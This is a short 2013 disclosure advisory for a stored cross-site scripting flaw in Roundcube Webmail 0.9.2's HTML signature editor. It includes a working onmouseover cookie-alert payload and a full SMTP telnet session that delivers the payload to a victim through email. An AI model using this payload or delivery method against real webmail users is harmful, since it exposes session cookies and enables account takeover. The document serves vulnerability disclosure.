* Roundcube Webmail 0.9.2 XSS Vulnerability
* ========================================================
*
* Site: http://www.roundcube.net
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================


Report-Timeline:
----------------
2013-07-18: Reported on Roundcube Track system (#1489251)


Introduction:
-------------
Roundcube webmail is a browser-based multilingual IMAP client
with an application-like user interface. It provides full
functionality you expect from an e-mail client, including
MIME support, address book, folder manipulation, message
searching and spell checking.


Description:
------------
i've found a XSS Vulnerability inside the "identity" configuration page.
Into the "Sign" textarea, enabling HTML Sign, i've click on "HTML" button
on the editor and i've write this HTML code:

test<b onmouseover="alert(document.cookie)">asd</b>

once you save it, when you move your mouse on the word "asd", the
JavaScript "alert(document.cookie)" will be executed by the client. Every
time you visit the "identity configuration page" the XSS is active.

when you save the new "html sign" and write a new html mail, the
XSS is still present and when you move your mouse over the sign, the
JavaScript XSS code will be executed by the client (see the attachments).

This Vulnerability is also present when the end user, receiving a mail
with this kind of "malicious" javascript code, clicks on "edit as new"
button. After click on it, the JavaScript will be executed by the client.


Exploit mail (tested by telnet on my MTA):
------------------------------------------

  HELO foobar.it
  MAIL FROM: und3r@fuckthepope.va
  RCPT TO: victim@vatican.va
  DATA
  From: Jesus <und3r@badguy.it>
  To: pope@vatican.va
  Subject: test      
  Content-Transfer-Encoding: quoted-printable
  Content-Type: text/html; charset="iso-8859-1"

  hey pope, edit this mail as new, 
  and send it to all your friends!

  <b onmouseover=alert(document.cookie)>put your mouse over here</b>

  .


Screenshot XSS Vulnerability:
-----------------------------
http://goo.gl/akomO
http://goo.gl/jpp83


CREDITS:
---------
This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)


LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.